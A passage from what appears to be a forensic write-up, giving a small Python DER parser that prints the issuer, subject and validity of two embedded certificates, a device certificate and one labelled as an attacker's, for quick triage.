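o2gpFwo5Vp1kib+dQrt+jgWoeEgL/sHd79ZeKDlwhX4sAKqG76k8aLirNU5AeO30
QUpCNjqy6kdqm2MWZAn4tpSYi9xn/3gftfrmbpmGLY5Cl3vlihrGzMPeWlK+gY1+
ovVb9seZTSgPCBGAxWWd77MSVAGw9LLodQZpus0U/VZgG4Ouc1kDA2kIvE9PISlc
9f/60aqqPt1n3x3TkZwegMh05IgYs60wpmydcdg5NOvlAgMBAAGjYDBeMB8GA1Ud
IwQYMBaAFK5LcpMC+tMMCts/MFF8rCzyeGBbMB0GA1UdDgQWBBRlT2pg4UoHtTrF
SckFkVZwPofFxjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG
9w0BAQsFAAOCAQEAmad1qCwQYzhAR7VqEHhI4X5p6yVQ+cSS6AF1a/zpPKJppwPQ
StDCF9ewjZlsE9o6qnClOQV9UgCaxJmX6ZHHjEitPnF+jIafDlYOxboXGxh2Z661
4sGsK3VEStfjNtnN10GdETAG7ThWmVXxOYml+ybWDUy2l9iw/pq6uuAZEtjcUxlh
SQl9jphjMjadRYAPtoegBnCGvdpDGmnz90b9aIu7U1wCcgV7QEKX+xHArCH+e9Mr
ItUCrKpFXybhzBPtbLp/4s2fa9KsX5s5WshIrq9Q/Ee/a0rWqO2HwV+erWg87uGc
1Vr8lRPuSWKwxqYG/Z35IS5gzUkhy0q1qJVjDg==
-----END CERTIFICATE-----"""

ATTACKER_CERT_PEM = """-----BEGIN CERTIFICATE-----
MIIDnjCCAoagAwIBAgIULItWQDaaBwZJXb9djdZQZIU4b7owDQYJKoZIhvcNAQEL
BQAwTTFLMEkGA1UECwxCQW1hem9uIFdlYiBTZXJ2aWNlcyBPPUFtYXpvbi5jb20g
SW5jLiBMPVNlYXR0bGUgU1Q9V2FzaGluZ3RvbiBDPVVTMB4XDTIzMTIyODE1NDQ1
NloXDTQ5MTIzMTIzNTk1OVowYzELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkhXMQow
CAYDVQQHDAFhMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxCjAI
BgNVBAsMAWQxDDAKBgNVBAMMA2JvYjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAPueyA6os9H7V7T65nd8rm5mTrbpSSFYFheRYN3aaZ8gvROWUJnz3b6E
KKzSwBWaQCJEAY1fMsicAMuOpq+u6YMFq1utda4uLaVRzGfbJBIKMOAAYaoC/lp8
iwA0Z3HRUWx/kVO2shBal7mm7kgq+i9vGf/k2qG2Phx/aqvcaJpsKskTt9pz5GdY
pBKav8FEg2YW601JXEY4+MIylDbU3Y0DAdSftYzaYk7Ol64eqGz/1DRaww5VNAaR
z5TdIYaKbalphLr7rPwaui76pmbgNLXzMXnhwQeh4nwn0ObdwWX+OOBRTmKM8vg6
r+AqRR4tkZFX7qGU3rXsC3S29lA48I8CAwEAAaNgMF4wHwYDVR0jBBgwFoAUy24K
2Wfaa9J+S7BMJ/Wv+esVvlEwHQYDVR0OBBYEFIwGcb+YrXxEOZcPPiFmkclhSGLT
MAwGA1UdEwEB/wQCMAAwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4IB
AQB1GEi1fKXwUgBI0VDZ0RFVSQCtFH1MeMPE+htPOuoxBvztefiywDozQR4V2no8
EmxDp5a4W/9Y0Xs+PAXU1AtgpfQWpwR0sxcdOSPW8x6jNv9f5Laj+mcbiQapw1ab
5BjizgV4eKCTrUYC37oFN/kAmwZDDw+0s4a1VfO2vvy43/YtYsPUk840moPywoz+
9aIJwgXFqmmt3YNwV5hRg0c7VXbfW2zy50BuqZlU9jDyu5d88u3xU3M1YHTbTGDp
hg4ByM52/Ve9zs/Ge0nGQuXM8gE1lNZvYsDxVvCQlJSRgGU+EypSGt7UjSOvIwu6
rnMvo4g8qaJVN4okrnQdqLzW
-----END CERTIFICATE-----"""

# X.520 attribute OIDs (2.5.4.x) we expect in these subjects, keyed by DER encoding.
ATTR_OIDS = {b"\x55\x04\x06": "C", b"\x55\x04\x08": "ST", b"\x55\x04\x07": "L",
             b"\x55\x04\x0a": "O", b"\x55\x04\x0b": "OU", b"\x55\x04\x03": "CN"}


def pem_to_der(pem):
    return base64.b64decode("".join(l for l in pem.split("\n") if not l.startswith("-----")))


def tlv(buf, pos=0):
    """Decode one DER tag-length-value at pos -> (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = byte count of the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def children(value):
    """Split a constructed value (SEQUENCE / SET) into its [(tag, value)] members."""
    out, pos = [], 0
    while pos < len(value):
        tag, body, pos = tlv(value, pos)
        out.append((tag, body))
    return out


def parse_name(name):
    """Name ::= SEQUENCE OF SET OF SEQUENCE { OID, value } -> [(short name, text)]."""
    attrs = []
    for _, rdn in children(name):
        for _, atv in children(rdn):
            (_, oid), (_, val) = children(atv)
            attrs.append((ATTR_OIDS.get(oid, oid.hex()), val.decode("utf-8", "replace")))
    return attrs


def tbs_fields(pem):
    """tbsCertificate members with the optional explicit [0] version dropped:
    serial, signatureAlgorithm, issuer, validity, subject, subjectPublicKeyInfo, ..."""
    _, cert, _ = tlv(pem_to_der(pem))
    fields = children(children(cert)[0][1])
    return fields[1:] if fields[0][0] == 0xA0 else fields


def cert_issuer(pem):
    return parse_name(tbs_fields(pem)[2][1])


def cert_subject(pem):
    return parse_name(tbs_fields(pem)[4][1])


def cert_validity(pem):
    (_, not_before), (_, not_after) = children(tbs_fields(pem)[3][1])
    return not_before.decode(), not_after.decode()   # UTCTime strings such as "491231235959Z"


if __name__ == "__main__":
    for label, pem in (("device", DEVICE_CERT_PEM), ("attacker", ATTACKER_CERT_PEM)):
        print(label, cert_issuer(pem), cert_subject(pem), cert_validity(pem))
```

The walker only understands what these two certificates contain (short and long-form lengths, PrintableString/UTF8String values, UTCTime); for anything beyond a quick triage of captured certificates, `openssl x509 -noout -text` or a proper ASN.1 library is the right tool.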